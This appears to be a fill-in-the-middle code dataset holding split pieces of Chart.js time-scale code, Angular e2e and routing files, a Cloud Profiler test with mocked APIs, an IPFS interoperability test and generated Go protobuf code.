if (offset === null) {
if (!value || !value.isValid) {
// not already a moment object
value = me.parseTime(me.getRightValue(value));
}
if (value && value.isValid && value.isValid()) {
offset = value.diff(me.firstTick, me.tickUnit, true);
}
}
if (offset !== null) {
var decimal = offset !== 0 ? offset / me.scaleSizeInUnits : offset;
if (me.isHorizontal()) {
var innerWidth = me.width - (me.paddingLeft + me.paddingRight);
var valueOffset = (innerWidth * decimal) + me.paddingLeft;
return me.left + Math.round(valueOffset);
}
var innerHeight = me.height - (me.paddingTop + me.paddingBottom);
var heightOffset = (innerHeight * decimal) + me.paddingTop;
return me.top + Math.round(heightOffset);
}
},
getPixelForTick: function (index) {
return this.getPixelForValue(this.tickMoments[index], null, null);
},
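// Inverse of getPixelForValue: convert the pixel's fractional position into
// scale units and add that duration (expressed in seconds to keep sub-unit
// precision) to the first tick.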
getValueForPixel: function (pixel) {
var me = this;
var innerDimension = me.isHorizontal() ? me.width - (me.paddingLeft + me.paddingRight) : me.height - (me.paddingTop + me.paddingBottom);
var offset = (pixel - (me.isHorizontal() ? me.left + me.paddingLeft : me.top + me.paddingTop)) / innerDimension;
offset *= me.scaleSizeInUnits;
return me.firstTick.clone().add(moment.duration(offset, me.tickUnit).asSeconds(), 'seconds');
},
parseTime: function (label) {
var me = this;
if (typeof me.options.time.parser === 'string') {
return moment(label, me.options.time.parser);
}
if (typeof me.options.time.parser === 'function') {
return me.options.time.parser(label);
}
// Date objects
if (typeof label.getMonth === 'function' || typeof label === 'number') {
return moment(label);
}
// Moment support
if (label.isValid && label.isValid()) {
return label;
}
// Custom parsing (return an instance of moment)
if (typeof me.options.time.format !== 'string' && me.options.time.format.call) {
console.warn('options.time.format is deprecated and replaced by options.time.parser. See http://nnnick.github.io/Chart.js/docs-v2/#scales-time-scale');
return me.options.time.format(label);
}
// Moment format parsing
return moment(label, me.options.time.format);
}
});
Chart.scaleService.registerScaleType('time', TimeScale, defaultConfig);
};
}, {"1": 1}]
}, {}, [7])(7)
}); | var x = vm.x;
var y = vm.y; |
app.e2e-spec.ts | import { AppPage } from './app.po';
import { browser, logging } from 'protractor';
describe('workspace-project App', () => {
let page: AppPage;
beforeEach(() => {
page = new AppPage();
});
it('should display welcome message', () => {
page.navigateTo();
expect(page.getTitleText()).toEqual('payment-tracker app is running!');
});
afterEach(async () => {
// Assert that there are no errors emitted from the browser | const logs = await browser.manage().logs().get(logging.Type.BROWSER);
expect(logs).not.toContain(jasmine.objectContaining({
level: logging.Level.SEVERE,
} as logging.Entry));
});
}); | |
root-routing.module.ts | import { NgModule } from '@angular/core';
import { NavigationEnd, Router, RouterModule, Routes } from '@angular/router';
import { AppUiCustomizationService } from '@shared/common/ui/app-ui-customization.service';
const routes: Routes = [
{ path: '', redirectTo: '/app/main/dashboard', pathMatch: 'full' },
{
path: 'account',
loadChildren: 'account/account.module#AccountModule', //Lazy load account module
data: { preload: true }
}
];
@NgModule({
imports: [RouterModule.forRoot(routes)], | providers: []
})
export class RootRoutingModule {
constructor(
private router: Router,
private _uiCustomizationService: AppUiCustomizationService) {
router.events.subscribe((event: NavigationEnd) => {
setTimeout(() => {
this.toggleBodyCssClass(event.url);
}, 0);
});
}
toggleBodyCssClass(url: string): void {
if (url) {
if (url === '/') {
if (eaf.session.userId > 0) {
this.setAppModuleBodyClassInternal();
} else {
this.setAccountModuleBodyClassInternal();
}
} else if (url.indexOf('/account/') >= 0) {
this.setAccountModuleBodyClassInternal();
} else {
this.setAppModuleBodyClassInternal();
}
}
}
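// Swaps in the app-module body class while preserving layout state (menu
// minimize/hide) and toast classes already present on <body>.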
setAppModuleBodyClassInternal(): void {
let currentBodyClass = document.body.className;
let classesToRemember = '';
if (currentBodyClass.indexOf('m-brand--minimize') >= 0) {
classesToRemember += ' m-brand--minimize ';
}
if (currentBodyClass.indexOf('m-aside-left--minimize') >= 0) {
classesToRemember += ' m-aside-left--minimize';
}
if (currentBodyClass.indexOf('m-brand--hide') >= 0) {
classesToRemember += ' m-brand--hide';
}
if (currentBodyClass.indexOf('m-aside-left--hide') >= 0) {
classesToRemember += ' m-aside-left--hide';
}
if (currentBodyClass.indexOf('swal2-toast-shown') >= 0) {
classesToRemember += ' swal2-toast-shown';
}
document.body.className = this._uiCustomizationService.getAppModuleBodyClass() + ' ' + classesToRemember;
}
setAccountModuleBodyClassInternal(): void {
let currentBodyClass = document.body.className;
let classesToRemember = '';
if (currentBodyClass.indexOf('swal2-toast-shown') >= 0) {
classesToRemember += ' swal2-toast-shown';
}
document.body.className = this._uiCustomizationService.getAccountModuleBodyClass() + ' ' + classesToRemember;
}
getSetting(key: string): string {
return eaf.setting.get(key);
}
} | exports: [RouterModule], |
test-start.ts | // Copyright 2017 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
import * as assert from 'assert';
import {describe, it, before, after} from 'mocha';
import delay from 'delay';
import * as nock from 'nock';
import {promisify} from 'util';
import * as zlib from 'zlib';
import {perftools} from '../protos/profile';
import {RequestProfile} from '../src/profiler';
const API = 'https://cloudprofiler.googleapis.com/v2';
let savedEnv: {};
let uploadedProfiles: RequestProfile[] = new Array<RequestProfile>();
let createProfileCount = 0;
nock.disableNetConnect();
// eslint-disable-next-line @typescript-eslint/no-var-requires
const fakeCredentials = require('../../test/fixtures/gcloud-credentials.json');
// Start profiler and collect profiles before testing.
before(async () => {
savedEnv = process.env;
process.env = {};
process.env.GCLOUD_PROJECT = 'test-projectId';
process.env.GAE_SERVICE = 'test-service';
process.env.GAE_VERSION = '0.0.0';
// Mock profiler API.
nock(API)
.persist()
.post('/projects/' + process.env.GCLOUD_PROJECT + '/profiles')
.delay(1000)
.reply(
200,
(): RequestProfile => {
let prof;
if (createProfileCount % 2 === 0) {
prof = {
name: 'projects/X/test-projectId',
profileType: 'WALL',
duration: '10s',
};
} else {
prof = {
name: 'projects/X/test-projectId',
profileType: 'HEAP',
duration: '10s',
};
}
createProfileCount++;
return prof;
}
);
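// (The mock above alternates between WALL and HEAP profile requests so both
// collection paths are exercised.)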
const tempUploadedProfiles = new Array<RequestProfile>();
nock(API)
.persist()
.patch('/projects/X/test-projectId')
.reply(200, (_: RequestProfile, body: RequestProfile) => {
if (typeof body === 'string') {
body = JSON.parse(body);
}
tempUploadedProfiles.push(body);
});
nock('https://oauth2.googleapis.com')
.post(/\/token/, () => true) | .reply(200, {
refresh_token: 'hello',
access_token: 'goodbye',
expiry_date: new Date(9999, 1, 1),
});
// start profiling and wait to collect profiles.
// eslint-disable-next-line @typescript-eslint/no-var-requires
const profiler = require('../src/index');
profiler.start({credentials: fakeCredentials});
await delay(30 * 1000);
// copy over currently uploaded profiles, so all tests look at same profiles.
uploadedProfiles = tempUploadedProfiles.slice();
// Restore environment variables and mocks.
process.env = savedEnv;
});
// Restore environment variables after tests.
// nock not restored, since profiles still being uploaded.
after(() => {
process.env = savedEnv;
});
describe('start', () => {
it('should have uploaded multiple profiles', () => {
nock.restore();
assert.ok(
uploadedProfiles.length >= 2,
'Expected 2 or more profiles to be uploaded'
);
});
it('should have uploaded wall profile with samples first', async () => {
const wall = uploadedProfiles[0];
const decodedBytes = Buffer.from(wall.profileBytes as string, 'base64');
const unzippedBytes = (await promisify(zlib.gunzip)(
decodedBytes
)) as Uint8Array;
const outProfile = perftools.profiles.Profile.decode(unzippedBytes);
assert.strictEqual(wall.profileType, 'WALL');
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[0].type as number],
'sample'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[1].type as number],
'wall'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[0].unit as number],
'count'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[1].unit as number],
'microseconds'
);
assert.ok(outProfile.sample.length > 0, 'Expected 1 or more samples');
});
it('should have uploaded heap profile second', async () => {
const heap = uploadedProfiles[1];
const decodedBytes = Buffer.from(heap.profileBytes as string, 'base64');
const unzippedBytes = (await promisify(zlib.gunzip)(
decodedBytes
)) as Uint8Array;
const outProfile = perftools.profiles.Profile.decode(unzippedBytes);
assert.strictEqual(heap.profileType, 'HEAP');
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[0].type as number],
'objects'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[1].type as number],
'space'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[0].unit as number],
'count'
);
assert.strictEqual(
outProfile.stringTable[outProfile.sampleType[1].unit as number],
'bytes'
);
});
}); | .once() |
repo.js | /* eslint-env mocha */
'use strict'
const chai = require('chai')
const dirtyChai = require('dirty-chai')
const expect = chai.expect
chai.use(dirtyChai)
const waterfall = require('async/waterfall')
const bl = require('bl')
const crypto = require('crypto')
const os = require('os')
const GoDaemon = require('./daemons/go')
const JsDaemon = require('./daemons/js')
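// Fetch `hash` from the given daemon and assert the returned bytes equal
// `data` before invoking `callback`.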
function | (daemon, hash, data, callback) {
waterfall([
(cb) => daemon.api.cat(hash, cb),
(stream, cb) => stream.pipe(bl(cb))
], (err, file) => {
console.log('got file')
expect(err).to.not.exist()
expect(file).to.be.eql(data)
callback()
})
}
describe('repo', () => {
it('read repo: go -> js', (done) => {
const dir = os.tmpdir() + '/' + Math.ceil(Math.random() * 10000)
const data = crypto.randomBytes(1024 * 5)
const goDaemon = new GoDaemon({
init: true,
disposable: false,
path: dir
})
let jsDaemon
let hash
waterfall([
(cb) => goDaemon.start(cb),
(cb) => goDaemon.api.add(data, cb),
(res, cb) => {
hash = res[0].hash
catAndCheck(goDaemon, hash, data, cb)
},
(cb) => goDaemon.stop(cb),
(cb) => {
jsDaemon = new JsDaemon({
init: false,
disposable: false,
path: dir
})
jsDaemon.start(cb)
},
(cb) => catAndCheck(jsDaemon, hash, data, cb),
(cb) => jsDaemon.stop(cb)
], done)
})
it('read repo: js -> go', (done) => {
const dir = os.tmpdir() + '/' + Math.ceil(Math.random() * 10000)
const data = crypto.randomBytes(1024 * 5)
const jsDaemon = new JsDaemon({init: true, disposable: false, path: dir})
let goDaemon
let hash
waterfall([
(cb) => jsDaemon.start(cb),
(cb) => jsDaemon.api.add(data, cb),
(res, cb) => {
hash = res[0].hash
catAndCheck(jsDaemon, hash, data, cb)
},
(cb) => jsDaemon.stop(cb),
(cb) => {
goDaemon = new GoDaemon({init: false, disposable: false, path: dir})
goDaemon.start(cb)
},
(cb) => catAndCheck(goDaemon, hash, data, cb),
(cb) => goDaemon.stop(cb)
], done)
})
})
| catAndCheck |
services.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: alameda_api/v1alpha1/datahub/plannings/services.proto
package plannings
import (
fmt "fmt"
common "github.com/containers-ai/api/alameda_api/v1alpha1/datahub/common"
resources "github.com/containers-ai/api/alameda_api/v1alpha1/datahub/resources"
proto "github.com/golang/protobuf/proto"
status "google.golang.org/genproto/googleapis/rpc/status"
math "math"
) | // Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
// Represents a request for creating a pod's plannings
type CreatePodPlanningsRequest struct {
PodPlannings []*PodPlanning `protobuf:"bytes,1,rep,name=pod_plannings,json=podPlannings,proto3" json:"pod_plannings,omitempty"`
Granularity int64 `protobuf:"varint,2,opt,name=granularity,proto3" json:"granularity,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *CreatePodPlanningsRequest) Reset() { *m = CreatePodPlanningsRequest{} }
func (m *CreatePodPlanningsRequest) String() string { return proto.CompactTextString(m) }
func (*CreatePodPlanningsRequest) ProtoMessage() {}
func (*CreatePodPlanningsRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{0}
}
func (m *CreatePodPlanningsRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_CreatePodPlanningsRequest.Unmarshal(m, b)
}
func (m *CreatePodPlanningsRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_CreatePodPlanningsRequest.Marshal(b, m, deterministic)
}
func (m *CreatePodPlanningsRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_CreatePodPlanningsRequest.Merge(m, src)
}
func (m *CreatePodPlanningsRequest) XXX_Size() int {
return xxx_messageInfo_CreatePodPlanningsRequest.Size(m)
}
func (m *CreatePodPlanningsRequest) XXX_DiscardUnknown() {
xxx_messageInfo_CreatePodPlanningsRequest.DiscardUnknown(m)
}
var xxx_messageInfo_CreatePodPlanningsRequest proto.InternalMessageInfo
func (m *CreatePodPlanningsRequest) GetPodPlannings() []*PodPlanning {
if m != nil {
return m.PodPlannings
}
return nil
}
func (m *CreatePodPlanningsRequest) GetGranularity() int64 {
if m != nil {
return m.Granularity
}
return 0
}
// Represents a request for creating a controller's plannings
type CreateControllerPlanningsRequest struct {
ControllerPlannings []*ControllerPlanning `protobuf:"bytes,1,rep,name=controller_plannings,json=controllerPlannings,proto3" json:"controller_plannings,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *CreateControllerPlanningsRequest) Reset() { *m = CreateControllerPlanningsRequest{} }
func (m *CreateControllerPlanningsRequest) String() string { return proto.CompactTextString(m) }
func (*CreateControllerPlanningsRequest) ProtoMessage() {}
func (*CreateControllerPlanningsRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{1}
}
func (m *CreateControllerPlanningsRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_CreateControllerPlanningsRequest.Unmarshal(m, b)
}
func (m *CreateControllerPlanningsRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_CreateControllerPlanningsRequest.Marshal(b, m, deterministic)
}
func (m *CreateControllerPlanningsRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_CreateControllerPlanningsRequest.Merge(m, src)
}
func (m *CreateControllerPlanningsRequest) XXX_Size() int {
return xxx_messageInfo_CreateControllerPlanningsRequest.Size(m)
}
func (m *CreateControllerPlanningsRequest) XXX_DiscardUnknown() {
xxx_messageInfo_CreateControllerPlanningsRequest.DiscardUnknown(m)
}
var xxx_messageInfo_CreateControllerPlanningsRequest proto.InternalMessageInfo
func (m *CreateControllerPlanningsRequest) GetControllerPlannings() []*ControllerPlanning {
if m != nil {
return m.ControllerPlannings
}
return nil
}
// Represents a request for listing plannings of pods
type ListPodPlanningsRequest struct {
QueryCondition *common.QueryCondition `protobuf:"bytes,1,opt,name=query_condition,json=queryCondition,proto3" json:"query_condition,omitempty"`
NamespacedName *resources.NamespacedName `protobuf:"bytes,2,opt,name=namespaced_name,json=namespacedName,proto3" json:"namespaced_name,omitempty"`
Kind resources.Kind `protobuf:"varint,3,opt,name=kind,proto3,enum=containersai.alameda.v1alpha1.datahub.resources.Kind" json:"kind,omitempty"`
Granularity int64 `protobuf:"varint,4,opt,name=granularity,proto3" json:"granularity,omitempty"`
PlanningType PlanningType `protobuf:"varint,5,opt,name=planning_type,json=planningType,proto3,enum=containersai.alameda.v1alpha1.datahub.plannings.PlanningType" json:"planning_type,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *ListPodPlanningsRequest) Reset() { *m = ListPodPlanningsRequest{} }
func (m *ListPodPlanningsRequest) String() string { return proto.CompactTextString(m) }
func (*ListPodPlanningsRequest) ProtoMessage() {}
func (*ListPodPlanningsRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{2}
}
func (m *ListPodPlanningsRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_ListPodPlanningsRequest.Unmarshal(m, b)
}
func (m *ListPodPlanningsRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_ListPodPlanningsRequest.Marshal(b, m, deterministic)
}
func (m *ListPodPlanningsRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_ListPodPlanningsRequest.Merge(m, src)
}
func (m *ListPodPlanningsRequest) XXX_Size() int {
return xxx_messageInfo_ListPodPlanningsRequest.Size(m)
}
func (m *ListPodPlanningsRequest) XXX_DiscardUnknown() {
xxx_messageInfo_ListPodPlanningsRequest.DiscardUnknown(m)
}
var xxx_messageInfo_ListPodPlanningsRequest proto.InternalMessageInfo
func (m *ListPodPlanningsRequest) GetQueryCondition() *common.QueryCondition {
if m != nil {
return m.QueryCondition
}
return nil
}
func (m *ListPodPlanningsRequest) GetNamespacedName() *resources.NamespacedName {
if m != nil {
return m.NamespacedName
}
return nil
}
func (m *ListPodPlanningsRequest) GetKind() resources.Kind {
if m != nil {
return m.Kind
}
return resources.Kind_POD
}
func (m *ListPodPlanningsRequest) GetGranularity() int64 {
if m != nil {
return m.Granularity
}
return 0
}
func (m *ListPodPlanningsRequest) GetPlanningType() PlanningType {
if m != nil {
return m.PlanningType
}
return PlanningType_PT_UNDEFINED
}
// Represents a response for listing pod plannings request
type ListPodPlanningsResponse struct {
Status *status.Status `protobuf:"bytes,1,opt,name=status,proto3" json:"status,omitempty"`
PodPlannings []*PodPlanning `protobuf:"bytes,2,rep,name=pod_plannings,json=podPlannings,proto3" json:"pod_plannings,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *ListPodPlanningsResponse) Reset() { *m = ListPodPlanningsResponse{} }
func (m *ListPodPlanningsResponse) String() string { return proto.CompactTextString(m) }
func (*ListPodPlanningsResponse) ProtoMessage() {}
func (*ListPodPlanningsResponse) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{3}
}
func (m *ListPodPlanningsResponse) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_ListPodPlanningsResponse.Unmarshal(m, b)
}
func (m *ListPodPlanningsResponse) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_ListPodPlanningsResponse.Marshal(b, m, deterministic)
}
func (m *ListPodPlanningsResponse) XXX_Merge(src proto.Message) {
xxx_messageInfo_ListPodPlanningsResponse.Merge(m, src)
}
func (m *ListPodPlanningsResponse) XXX_Size() int {
return xxx_messageInfo_ListPodPlanningsResponse.Size(m)
}
func (m *ListPodPlanningsResponse) XXX_DiscardUnknown() {
xxx_messageInfo_ListPodPlanningsResponse.DiscardUnknown(m)
}
var xxx_messageInfo_ListPodPlanningsResponse proto.InternalMessageInfo
func (m *ListPodPlanningsResponse) GetStatus() *status.Status {
if m != nil {
return m.Status
}
return nil
}
func (m *ListPodPlanningsResponse) GetPodPlannings() []*PodPlanning {
if m != nil {
return m.PodPlannings
}
return nil
}
// Represents a request for listing plannings of controllers
type ListControllerPlanningsRequest struct {
QueryCondition *common.QueryCondition `protobuf:"bytes,1,opt,name=query_condition,json=queryCondition,proto3" json:"query_condition,omitempty"`
NamespacedName *resources.NamespacedName `protobuf:"bytes,2,opt,name=namespaced_name,json=namespacedName,proto3" json:"namespaced_name,omitempty"`
CtlPlanningType ControllerPlanningType `protobuf:"varint,3,opt,name=ctl_planning_type,json=ctlPlanningType,proto3,enum=containersai.alameda.v1alpha1.datahub.plannings.ControllerPlanningType" json:"ctl_planning_type,omitempty"`
PlanningType PlanningType `protobuf:"varint,4,opt,name=planning_type,json=planningType,proto3,enum=containersai.alameda.v1alpha1.datahub.plannings.PlanningType" json:"planning_type,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *ListControllerPlanningsRequest) Reset() { *m = ListControllerPlanningsRequest{} }
func (m *ListControllerPlanningsRequest) String() string { return proto.CompactTextString(m) }
func (*ListControllerPlanningsRequest) ProtoMessage() {}
func (*ListControllerPlanningsRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{4}
}
func (m *ListControllerPlanningsRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_ListControllerPlanningsRequest.Unmarshal(m, b)
}
func (m *ListControllerPlanningsRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_ListControllerPlanningsRequest.Marshal(b, m, deterministic)
}
func (m *ListControllerPlanningsRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_ListControllerPlanningsRequest.Merge(m, src)
}
func (m *ListControllerPlanningsRequest) XXX_Size() int {
return xxx_messageInfo_ListControllerPlanningsRequest.Size(m)
}
func (m *ListControllerPlanningsRequest) XXX_DiscardUnknown() {
xxx_messageInfo_ListControllerPlanningsRequest.DiscardUnknown(m)
}
var xxx_messageInfo_ListControllerPlanningsRequest proto.InternalMessageInfo
func (m *ListControllerPlanningsRequest) GetQueryCondition() *common.QueryCondition {
if m != nil {
return m.QueryCondition
}
return nil
}
func (m *ListControllerPlanningsRequest) GetNamespacedName() *resources.NamespacedName {
if m != nil {
return m.NamespacedName
}
return nil
}
func (m *ListControllerPlanningsRequest) GetCtlPlanningType() ControllerPlanningType {
if m != nil {
return m.CtlPlanningType
}
return ControllerPlanningType_CPT_UNDEFINED
}
func (m *ListControllerPlanningsRequest) GetPlanningType() PlanningType {
if m != nil {
return m.PlanningType
}
return PlanningType_PT_UNDEFINED
}
// Represents a response for listing controller plannings request
type ListControllerPlanningsResponse struct {
Status *status.Status `protobuf:"bytes,1,opt,name=status,proto3" json:"status,omitempty"`
ControllerPlannings []*ControllerPlanning `protobuf:"bytes,2,rep,name=controller_plannings,json=controllerPlannings,proto3" json:"controller_plannings,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *ListControllerPlanningsResponse) Reset() { *m = ListControllerPlanningsResponse{} }
func (m *ListControllerPlanningsResponse) String() string { return proto.CompactTextString(m) }
func (*ListControllerPlanningsResponse) ProtoMessage() {}
func (*ListControllerPlanningsResponse) Descriptor() ([]byte, []int) {
return fileDescriptor_1293ef3062f3443f, []int{5}
}
func (m *ListControllerPlanningsResponse) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_ListControllerPlanningsResponse.Unmarshal(m, b)
}
func (m *ListControllerPlanningsResponse) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_ListControllerPlanningsResponse.Marshal(b, m, deterministic)
}
func (m *ListControllerPlanningsResponse) XXX_Merge(src proto.Message) {
xxx_messageInfo_ListControllerPlanningsResponse.Merge(m, src)
}
func (m *ListControllerPlanningsResponse) XXX_Size() int {
return xxx_messageInfo_ListControllerPlanningsResponse.Size(m)
}
func (m *ListControllerPlanningsResponse) XXX_DiscardUnknown() {
xxx_messageInfo_ListControllerPlanningsResponse.DiscardUnknown(m)
}
var xxx_messageInfo_ListControllerPlanningsResponse proto.InternalMessageInfo
func (m *ListControllerPlanningsResponse) GetStatus() *status.Status {
if m != nil {
return m.Status
}
return nil
}
func (m *ListControllerPlanningsResponse) GetControllerPlannings() []*ControllerPlanning {
if m != nil {
return m.ControllerPlannings
}
return nil
}
func init() {
proto.RegisterType((*CreatePodPlanningsRequest)(nil), "containersai.alameda.v1alpha1.datahub.plannings.CreatePodPlanningsRequest")
proto.RegisterType((*CreateControllerPlanningsRequest)(nil), "containersai.alameda.v1alpha1.datahub.plannings.CreateControllerPlanningsRequest")
proto.RegisterType((*ListPodPlanningsRequest)(nil), "containersai.alameda.v1alpha1.datahub.plannings.ListPodPlanningsRequest")
proto.RegisterType((*ListPodPlanningsResponse)(nil), "containersai.alameda.v1alpha1.datahub.plannings.ListPodPlanningsResponse")
proto.RegisterType((*ListControllerPlanningsRequest)(nil), "containersai.alameda.v1alpha1.datahub.plannings.ListControllerPlanningsRequest")
proto.RegisterType((*ListControllerPlanningsResponse)(nil), "containersai.alameda.v1alpha1.datahub.plannings.ListControllerPlanningsResponse")
}
func init() {
proto.RegisterFile("alameda_api/v1alpha1/datahub/plannings/services.proto", fileDescriptor_1293ef3062f3443f)
}
var fileDescriptor_1293ef3062f3443f = []byte{
// 544 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xdc, 0x55, 0xc1, 0x8e, 0xd3, 0x30,
0x10, 0x55, 0xda, 0xb2, 0x07, 0x77, 0xb7, 0x15, 0x01, 0x69, 0xc3, 0x1e, 0x20, 0xea, 0xa9, 0x42,
0xc2, 0x56, 0x8b, 0x96, 0x13, 0x08, 0x89, 0x0a, 0x21, 0x04, 0x42, 0x4b, 0xe0, 0xc4, 0x25, 0x9a,
0x3a, 0x56, 0x6b, 0x91, 0xda, 0xae, 0xed, 0x54, 0xea, 0xaf, 0x70, 0xe2, 0xca, 0x37, 0x70, 0xe6,
0xc2, 0x57, 0xa1, 0xa4, 0x49, 0x48, 0x09, 0x5b, 0x25, 0xa8, 0x5c, 0xf6, 0x36, 0xb6, 0x33, 0xf3,
0x9e, 0xe6, 0xbd, 0xc9, 0xa0, 0x4b, 0x88, 0x61, 0xc5, 0x22, 0x08, 0x41, 0x71, 0xb2, 0x99, 0x40,
0xac, 0x96, 0x30, 0x21, 0x11, 0x58, 0x58, 0x26, 0x73, 0xa2, 0x62, 0x10, 0x82, 0x8b, 0x85, 0x21,
0x86, 0xe9, 0x0d, 0xa7, 0xcc, 0x60, 0xa5, 0xa5, 0x95, 0x2e, 0xa1, 0x52, 0x58, 0xe0, 0x82, 0x69,
0x03, 0x1c, 0xe7, 0x35, 0x70, 0x91, 0x8f, 0xf3, 0x7c, 0x5c, 0xe6, 0x5f, 0x4c, 0x0e, 0xe2, 0x50,
0xb9, 0x5a, 0x49, 0x41, 0xd6, 0x09, 0xd3, 0xbc, 0xc0, 0xb8, 0x78, 0xd2, 0x90, 0x5a, 0x19, 0xe5,
0x79, 0xd3, 0x86, 0x79, 0x76, 0xab, 0x4a, 0xac, 0xc3, 0x6d, 0xd0, 0xcc, 0xc8, 0x44, 0x53, 0x66,
0xc8, 0x8a, 0x59, 0x48, 0x6f, 0x1b, 0x41, 0xfd, 0x4e, 0xab, 0x42, 0x9d, 0x2f, 0xa4, 0x5c, 0xc4,
0x8c, 0x68, 0x45, 0x89, 0xb1, 0x60, 0x93, 0xfc, 0x61, 0xf4, 0xd5, 0x41, 0xf7, 0x66, 0x9a, 0x81,
0x65, 0x57, 0x32, 0xba, 0x2a, 0x68, 0x06, 0x6c, 0x9d, 0x30, 0x63, 0x5d, 0x40, 0x67, 0x4a, 0x46,
0x61, 0x49, 0xdf, 0x73, 0xfc, 0xee, 0xb8, 0x3f, 0x7d, 0x8a, 0x5b, 0x2a, 0x81, 0x2b, 0xc5, 0x83,
0x53, 0x55, 0x41, 0x72, 0x7d, 0xd4, 0x5f, 0x68, 0x10, 0x49, 0x0c, 0x9a, 0xdb, 0xad, 0xd7, 0xf1,
0x9d, 0x71, 0x37, 0xa8, 0x5e, 0x8d, 0xbe, 0x38, 0xc8, 0xdf, 0x51, 0x9c, 0x49, 0x61, 0xb5, 0x8c,
0x63, 0xa6, 0x6b, 0x4c, 0x37, 0xe8, 0x2e, 0x2d, 0x5f, 0x6b, 0x84, 0x67, 0xad, 0x09, 0xd7, 0xa1,
0x82, 0x3b, 0xb4, 0x0e, 0x3f, 0xfa, 0xde, 0x45, 0xe7, 0x6f, 0xb9, 0xb1, 0x7f, 0xeb, 0x1e, 0x43,
0xc3, 0xd4, 0x5c, 0xdb, 0x90, 0x4a, 0x11, 0x71, 0xcb, 0xa5, 0xf0, 0x1c, 0xdf, 0x69, 0xd1, 0xbf,
0x9d, 0x43, 0xf1, 0xfb, 0xb4, 0xc8, 0xac, 0xa8, 0x11, 0x0c, 0xd6, 0x7b, 0x67, 0x77, 0x89, 0x86,
0x02, 0x56, 0xcc, 0x28, 0xa0, 0x2c, 0x0a, 0xd3, 0x30, 0xeb, 0x62, 0x7f, 0xfa, 0xbc, 0x21, 0x4c,
0x69, 0x19, 0xfc, 0xae, 0xac, 0x93, 0x46, 0xc1, 0x40, 0xec, 0x9d, 0xdd, 0xd7, 0xa8, 0xf7, 0x99,
0x8b, 0xc8, 0xeb, 0xfa, 0xce, 0x78, 0x30, 0xbd, 0x6c, 0x5d, 0xfe, 0x0d, 0x17, 0x51, 0x90, 0x95,
0xf8, 0x53, 0xf6, 0x5e, 0x4d, 0x76, 0x77, 0x8e, 0xce, 0x0a, 0x39, 0xc2, 0xd4, 0xca, 0xde, 0xad,
0x0c, 0xf5, 0x59, 0x7b, 0xef, 0xe5, 0xd1, 0xc7, 0xad, 0x62, 0xc1, 0xa9, 0xaa, 0x9c, 0x46, 0xdf,
0x1c, 0xe4, 0xd5, 0xd5, 0x33, 0x4a, 0x0a, 0xc3, 0xdc, 0x87, 0xe8, 0x64, 0x37, 0x2a, 0xb9, 0x6a,
0x2e, 0xde, 0x0d, 0x11, 0xd6, 0x8a, 0xe2, 0x0f, 0xd9, 0x4b, 0x90, 0x7f, 0x51, 0x1f, 0x94, 0xce,
